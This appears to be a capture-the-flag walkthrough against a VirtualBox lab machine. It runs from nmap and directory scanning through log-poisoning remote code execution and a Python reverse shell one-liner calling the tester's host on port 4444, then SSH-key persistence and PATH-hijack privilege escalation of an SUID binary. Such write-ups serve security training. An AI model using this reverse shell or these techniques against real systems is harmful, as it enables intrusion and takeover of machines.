Netdiscover
NMAP
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-09 00:43 PKT
Nmap scan report for 192.168.1.9
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/eventadmins
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:EE:16:C7 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds
We have 2 ports open http and ssh and we have robots.txt on the webserver
PORT 80 (HTTP)
Dirbuster
Running dirbuster we can see there is robots.txt , secret and wp-admin which tells that there is wordpress running on the machine and these directories are interesting to us.
We visit robots.txt
From there we can see it doesn’t allow /eventadmins to be shown on webcrawlers
So john and buddyG might be the two usernames also visiting littlequeenofspades.html
We would find a base64 encoded text
On further decoding the text
We will get a page adminsfixit.php
Here we can see ssh authorization log which logs about the users when anyone tries to login with a username and gives success or failed attempt message
As you can see when we interact with SSH it gets log I tried to login with arz and it got logged.Now let's try to add php GET paramter which will test if we can get Remote Code Execution or not
And it did worked
***Note : My private IP was changed due to a change of network also if your doing something with special characters bash is the way to go , we need to be careful with special characters when using zsh shell. ***
Now I’ll check for python if it is installed with which python
Great now I’ll setup the python reverse shell
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.43.129”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
And we are in !!!
Stabilize the shell with python
This might work differently in zsh shell
Now we find a user named robertj and we can write to the .ssh directory so generate a ssh key pair with ssh-keygen on your host machine and transfer it through wget or python server
As you can see we are hosting the public and private key so we need only public on the target machine and private with us to communicate with it.Copy the contents of id_rsa.pub move to target machine and rename it to authorized_keys in the .ssh folder.
Privilege Escalation
Now let’s find if there are SUID binaries on the box
Through this find command we found a binary named getinfo which is not normal to have SUID it belongs to user root and group operator looking our UID and GID we are in operators group so we can do something with it.
On running the binary
It basically is running the following commands in the binary
So here what we can do is make a file with the name of ip put /bin/bash in it make it executable and change the PATH variable which is known as "Exploiting PATH variable"
And now when we’ll run the binary
We will be root !!!
